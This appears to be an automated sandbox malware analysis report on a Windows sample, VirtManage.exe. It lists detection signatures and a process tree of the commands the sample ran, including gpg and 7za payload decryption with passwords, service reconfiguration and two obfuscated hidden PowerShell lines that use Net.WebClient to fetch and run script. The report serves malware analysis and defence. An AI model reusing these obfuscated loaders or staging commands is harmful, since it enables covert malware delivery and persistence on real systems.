Windows
Analysis Report
VirtManage.exe
Overview
General Information
Detection
Score: | 42 |
Range: | 0 - 100 |
Confidence: | 100% |
Compliance
Score: | 34 |
Range: | 0 - 100 |
Signatures
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
.NET source code contains a domain name check
Encrypted powershell cmdline option found
Loading BitLocker PowerShell Module
Obfuscated command line found
Sigma detected: Dot net compiler compiles file from suspicious location
Suspicious powershell command line found
Uses whoami command line tool to query computer and username
Adds / modifies Windows certificates
Checks for available system drives (often done to infect USB drives)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Uses 7zip to decompress a password protected archive
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
VirtManage.exe (PID: 6792 cmdline:
"C:\Users\ user\Deskt op\VirtMan age.exe" MD5: B587A6AF7FD86EEB42425913B8D73D47) gpg.exe (PID: 3528 cmdline:
C:\Program Data\Micro soft\Windo wsUpdate24 \gpg.exe - -passphras e "1234567 8" --batch --yes --o utput C:\P rogramData \Microsoft \WindowsUp date24\too ls.7z --de crypt C:\P rogramData \Microsoft \WindowsUp date24\5FI LE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756) conhost.exe (PID: 1480 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) gpg.exe (PID: 7036 cmdline:
C:\Program Data\Micro soft\Windo wsUpdate24 \gpg.exe - -passphras e "1234567 8" --batch --yes --o utput C:\P rogramData \Microsoft \WindowsUp date24\7za .dll --dec rypt C:\Pr ogramData\ Microsoft\ WindowsUpd ate24\1FIL E.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756) conhost.exe (PID: 5400 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) gpg.exe (PID: 4148 cmdline:
C:\Program Data\Micro soft\Windo wsUpdate24 \gpg.exe - -passphras e "1234567 8" --batch --yes --o utput C:\P rogramData \Microsoft \WindowsUp date24\7za .exe --dec rypt C:\Pr ogramData\ Microsoft\ WindowsUpd ate24\2FIL E.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756) conhost.exe (PID: 1264 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 7za.exe (PID: 4256 cmdline:
C:\Program Data\Micro soft\Windo wsUpdate24 \7za x C:\ ProgramDat a\Microsof t\WindowsU pdate24\to ols.7z -pJ erx#sdqWE4 5 -oC:\Pro gramData\M icrosoft\W indowsUpda te24 MD5: C58A4193BAC738B1A88ACAD9C6A57356) conhost.exe (PID: 4380 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) msiexec.exe (PID: 3376 cmdline:
msiexec.ex e /i "C:\P rogramData \Microsoft \WindowsUp date24\RVT ools.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF) gpg.exe (PID: 5800 cmdline:
C:\Program Data\Micro soft\Windo wsUpdate24 \gpg.exe - -passphras e "1234567 8" --batch --yes --o utput C:\P rogramData \Microsoft \WindowsUp date24\Cer t.txt --de crypt C:\P rogramData \Microsoft \WindowsUp date24\3FI LE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756) conhost.exe (PID: 6292 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) w32tm.exe (PID: 6884 cmdline:
w32tm /mon itor /comp uters:ec2- 52-14-160- 176.us-eas t-2.comput e.amazonaw s.com MD5: E55B6A057FDDD35A7380FB2C6811A8EC) conhost.exe (PID: 2648 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) w32tm.exe (PID: 1264 cmdline:
w32tm /mon itor /comp uters:ec2- 52-14-160- 176.us-eas t-2.comput e.amazonaw s.com MD5: 81A82132737224D324A3E8DA993E2FB5) gpg.exe (PID: 2904 cmdline:
C:\Program Data\Micro soft\Windo wsUpdate24 \gpg.exe - -passphras e "1234567 8" --batch --yes --o utput C:\P rogramData \Microsoft \WindowsUp date24\Upd ateFull.7z --decrypt C:\Progra mData\Micr osoft\Wind owsUpdate2 4\4FILE.1A .gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756) conhost.exe (PID: 3012 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 7za.exe (PID: 5412 cmdline:
C:\Program Data\Micro soft\Windo wsUpdate24 \7za x C:\ ProgramDat a\Microsof t\WindowsU pdate24\Up dateFull.7 z -pTG98HJ erxsdqWE45 -oC:\Prog ramData\Mi crosoft\Wi ndowsUpdat e24 MD5: C58A4193BAC738B1A88ACAD9C6A57356) conhost.exe (PID: 5508 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) sc.exe (PID: 1960 cmdline:
sc config msdtc star t= demand MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8) conhost.exe (PID: 1896 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) sc.exe (PID: 7132 cmdline:
sc config msdtc obj= "LocalSys tem" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8) conhost.exe (PID: 5792 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) oleview.exe (PID: 5724 cmdline:
C:\Program Data\Micro soft\Windo wsUpdate24 \oleview.e xe MD5: ADB9B72679B88DDE1749E0A438222156) powershell.exe (PID: 5872 cmdline:
powershell .exe -wind owstyle Hi dden -comm and "SI Va riable:/E $('C:\Prog ra'+'mData \Mic'+'ros oft\Wind'+ 'owsUpdate 24\kau'+'t ix2ae'+'X. t');popd;S et-Variabl e X (.(Ite m Variable :*xec*t).V alue.Invok eCommand.( ((Item Var iable:*xec *t).Value. InvokeComm and|Get-Me mber|Where -Object{(L S Variable :\_).Value .Name-like '*mma*d'}) .Name).Inv oke((Item Variable:* xec*t).Val ue.InvokeC ommand.((( Item Varia ble:*xec*t ).Value.In vokeComman d|Get-Memb er|Where-O bject{(LS Variable:\ _).Value.N ame-like'* dName'}).N ame).Invok e('*w-*ct' ,1,1),[Man agement.Au tomation.C ommandType s]::Cmdlet )Net.WebCl ient);(Get -ChildItem Variable: \X).Value. ((((Get-Ch ildItem Va riable:\X) .Value|Get -Member)|W here-Objec t{(LS Vari able:\_).V alue.Name- like'*nl*g '}).Name). Invoke((GC I Variable :\E).Value )|.( ([Str ing]''.Nor malize)[77 ,35,46]-Jo in'')" MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 5816 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) csc.exe (PID: 5812 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\b0okyd tw\b0okydt w.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66) cvtres.exe (PID: 5652 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESA360.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\b0o kydtw\CSCB 61681A6E66 748218243D 78918A832B .TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) whoami.exe (PID: 7368 cmdline:
"C:\Window s\system32 \whoami.ex e" MD5: A4A6924F3EAF97981323703D38FD99C4)
msiexec.exe (PID: 5700 cmdline:
C:\Windows \system32\ msiexec.ex e /V MD5: E5DA170027542E25EDE42FC54C929077) msiexec.exe (PID: 6964 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng FB5755C 4D12C2C80E 27834E9FC6 EF971 C MD5: 9D09DC1EDA745A5F87553048E57620CF) WmiPrvSE.exe (PID: 1324 cmdline:
C:\Windows \sysWOW64\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
oleview.exe (PID: 6672 cmdline:
"C:\Progra mData\Micr osoft\LogU pdateWindo ws\oleview .exe" MD5: ADB9B72679B88DDE1749E0A438222156) powershell.exe (PID: 6556 cmdline:
powershell .exe -wind owstyle Hi dden -comm and "SI Va riable:/gO $('C:\Pro '+'gramDat a\Mic'+'ro so'+'ft\Lo gUp'+'date Wi'+'ndows \Wiaph'+'o h7um.t');S et-Item Va riable:/fH 'Net.WebC lient';dir ect*;SV B O (.$Execu tionContex t.(($Execu tionContex t|GM)[6].N ame).(($Ex ecutionCon text.(($Ex ecutionCon text|GM)[6 ].Name).Ps Object.Met hods|Where {(Get-Chil dItem Vari able:\_).V alue.Name- like'*dl*t s'}).Name) .Invoke('N e*ct')(Var iable fH - Value));SI Variable: 2Rn ((((Ge t-ChildIte m Variable :/BO).Valu e|GM)|Wher e{(Get-Chi ldItem Var iable:\_). Value.Name -like'*nl* g'}).Name) ;Invoke-Co mmand(($Ex ecutionCon text|ForEa ch{(Get-Ch ildItem Va riable:\_) .Value.(($ ExecutionC ontext|GM) [6].Name)| ForEach{(G CI Variabl e:\_).Valu e.NewScrip tBlock((Ge t-ChildIte m Variable :/BO).Valu e.((Item V ariable:/2 Rn).Value) .Invoke((G I Variable :/gO).Valu e))}}))" MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 5508 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
svchost.exe (PID: 5808 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
⊘No configs have been found
⊘No yara matches
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |